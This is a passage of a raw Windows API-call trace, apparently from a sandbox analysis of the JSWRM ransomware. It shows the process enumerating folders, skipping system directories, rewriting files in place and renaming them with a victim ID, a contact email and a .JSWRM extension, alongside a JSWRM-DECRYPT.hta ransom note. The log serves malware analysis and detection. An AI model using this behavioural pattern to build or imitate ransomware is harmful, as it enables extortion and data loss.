1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.758] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0059.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0059.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0059.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.758] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.759] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=4040) returned 1 [0059.759] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfc0) returned 0x23dc88 [0059.759] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xfc0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xfc0, lpOverlapped=0x0) returned 1 [0059.760] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.760] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xfc0, lpOverlapped=0x0) returned 1 [0059.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.760] CloseHandle (hObject=0x3d4) returned 1 [0059.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0059.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0059.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0059.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0059.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0059.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.761] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0059.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.762] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a479436, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a479436, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a479436, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.762] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0059.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0059.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0059.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0059.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0059.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0059.763] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0059.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0059.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0059.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0059.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0059.764] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.764] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=82374) returned 1 [0059.764] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x141c0) returned 0x2471a8 [0059.764] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x141c0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x141c0, lpOverlapped=0x0) returned 1 [0059.787] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.787] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x141c0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x141c0, lpOverlapped=0x0) returned 1 [0059.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.788] CloseHandle (hObject=0x3d4) returned 1 [0059.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0059.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0059.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0059.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0059.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0059.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.790] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0059.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0059.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0059.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0059.791] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.791] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0059.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241038, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0059.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0059.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0059.792] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.792] FindClose (in: hFindFile=0x231f80 | out: hFindFile=0x231f80) returned 1 [0059.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0059.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.792] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1046", cAlternateFileName="")) returned 1 [0059.792] lstrcmpiW (lpString1="1046", lpString2=".") returned 1 [0059.792] lstrcmpiW (lpString1="1046", lpString2="..") returned 1 [0059.792] lstrcmpiW (lpString1="1046", lpString2="...") returned 1 [0059.792] lstrcmpiW (lpString1="1046", lpString2="windows") returned -1 [0059.792] lstrcmpiW (lpString1="1046", lpString2="recovery") returned -1 [0059.792] lstrcmpiW (lpString1="1046", lpString2="perflogs") returned -1 [0059.792] lstrcmpiW (lpString1="1046", lpString2="documents and settings") returned -1 [0059.792] lstrcmpiW (lpString1="1046", lpString2="$RECYCLE.BIN") returned 1 [0059.792] lstrcmpiW (lpString1="1046", lpString2="system volume information") returned -1 [0059.792] lstrcmpiW (lpString1="1046", lpString2="msocache") returned -1 [0059.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0059.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0059.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0059.793] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1046\\jswrm-decrypt.hta")) returned 0xffffffff [0059.793] HeapFree (in: 